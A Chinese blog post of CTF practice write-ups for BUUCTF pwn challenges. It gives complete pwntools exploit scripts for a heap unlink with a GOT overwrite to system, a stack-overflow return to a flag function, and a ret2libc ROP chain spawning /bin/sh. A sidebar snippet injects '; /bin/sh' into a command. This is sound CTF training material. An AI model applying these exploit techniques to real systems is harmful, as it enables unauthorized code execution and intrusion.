PWN-PRACTICE-BUUCTF-22

最新推荐文章于 2021-12-22 20:04:26 发布
最新推荐文章于 2021-12-22 20:04:26 发布
阅读量426 收藏
点赞数
分类专栏: Pwn-BUUCTF 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/120181304
版权

PWN-PRACTICE-BUUCTF-22

hitcontraining_unlink

unlink,参考:[BUUCTF]PWN——hitcontraining_unlink

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bamboobox")
io=remote("node4.buuoj.cn",25178)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
	io.sendlineafter("Your choice:","1")	
def add(name_len,name):
	io.sendlineafter("Your choice:","2")
	io.sendlineafter("the length of item name:",str(name_len))
	io.sendlineafter("the name of item:",name)
def edit(index,name_len,name):
	io.sendlineafter("Your choice:","3")
	io.sendlineafter("the index of item:",str(index))
	io.sendlineafter("the length of item name:",str(name_len))
	io.sendlineafter("the new name of the item:",name)
def free(index):
	io.sendlineafter("Your choice:","4")
	io.sendlineafter("the index of item:",str(index))
def exit():
	io.sendlineafter("Your choice:","5")

#gdb.attach(io)
#pause()

add(0x40,"aaaa")
add(0x80,"bbbb")
add(0x80,"cccc")

#pause()

ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,"A")
payload+=p64(0x40)+p64(0x90)
edit(0,len(payload),payload)

#pause()

free(1)

#pause()

atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)
edit(0,len(payload),payload)

#pause()

show()
io.recvuntil("0 : ")
atoi_addr=u64(io.recv(6).ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]

#pause()

edit(0,0x08,p64(system))

#pause()

io.sendlineafter("Your choice:","/bin/sh\x00")

io.interactive()

picoctf_2018_leak_me

v5字符数组大小为256,在后面高地址处跟着的是s字符数组,程序会读取password.txt到s
后面有一句puts(v5),puts遇到"\x00"才会停止打印
将v5的256个字符全部填充为"a",没有回车"\n",就不会在结尾设置"\x00"
puts(v5)的时候就可以将password打印出来
leak-main
再次nc到服务器,输入正确的密码即可得到flag
leak-flag

suctf_2018_basic pwn

栈溢出

from pwn import *
#io=process('./SUCTF_2018_basic_pwn')
io=remote('node4.buuoj.cn',26502)
flag_addr=0x401157
payload='a'*(0x110+8)+p64(flag_addr)
io.sendline(payload)
io.interactive()

axb_2019_brop64

栈溢出,ret2libc

from pwn import *
context.log_level="debug"
#io=process('./axb_2019_brop64')
io=remote('node4.buuoj.cn',29347)
elf=ELF('./axb_2019_brop64')
libc=ELF('./libc-2.23-x64.so')
main=0x4007d6
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400963	

io.recvuntil('Please tell me:')
payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload)

puts_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()

io.recvuntil('Please tell me:')
payload='a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
io.sendline(payload)

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
PWN-PRACTICE-BUUCTF-1
P1umH0的博客
07-04 177
PWN-PRACTICE-BUUCTF-1
[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 302
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1015
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
buuctf刷题记录(一)
qq_43571856的博客
08-03 364
vn_pwn_warmup 开了nx和pie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。 对于这种禁用execve或者没法使用system直接getshell的题。 我们可以使用orw来做。 可以把paylaod写到这里 然后在跳到这里执行 但是这个题没法用题目文件里的r
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn-200题目文件
02-16
pwn-200题目文件
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 355
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
【Writeup】BUUCTF_Web_高明的黑客
BAKUMANSEC - Just Do It
08-19 1151
0x01 解题思路   这题下载源码一看似乎有很多一句话木马,但是大多数根本没法执行命令,而且文件和参数都比较多,所以比较普遍的做法是本地搭个环境(PHP7)尝试所有的GET和POST参数。CTF Writeups给的wp:https://www.ctfwp.com/articals/2019qiangwang.html#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%...
[BUUCTF]PWN——picoctf_2018_are you root(程序逻辑错误)
mcmuyanga的博客
03-17 465
picoctf_2018_are you root 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 295
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
BUUCTF-PWN刷题记录-2
weixin_44145820的博客
03-15 624
目录gyctf_2020_borrowstack gyctf_2020_borrowstack 本题只有有限的溢出空间,而且有NX的保护,只能用ROP的办法 利用方法为把rbp改为bank+4的地址,返回地址改为leave的地址,这样就能利用RBP修改RSP,bank前8个字节填写bank+8的地址,之后跟上ROP链, 不过这题还有一点,就是Bank离stdin和stdout比较近,需要先使用...
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 374
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个题.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 236
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
BUUCTF - PWN】baby_rop
古月浪子的博客
04-05 369
checksec一下,栈溢出 IDA打开看看,很明显的溢出点,/bin/sh字符串在程序里也有现成的,通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
[BUUCTF-pwn] hungman_csaw_2016
weixin_52640415的博客
12-22 151
学习的这个exp 先弄清楚流程: 先读入name然后根据大小建个堆块 建0x80的块用来管理:{4:score,4:name_len,8:ptr->name} 读入随机数跟name加密成a-z的字符,然后与输入相同则显示并加分 超score则可重写name,最长可写0xf8 明显溢出 思路: 随便写入A*26,然后从a猜到z肯定能成功 成功后写溢出,修改score=0,len=27,ptr=got.__libc_start_main在回显name时得到libc。因为后边要将got.mem
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值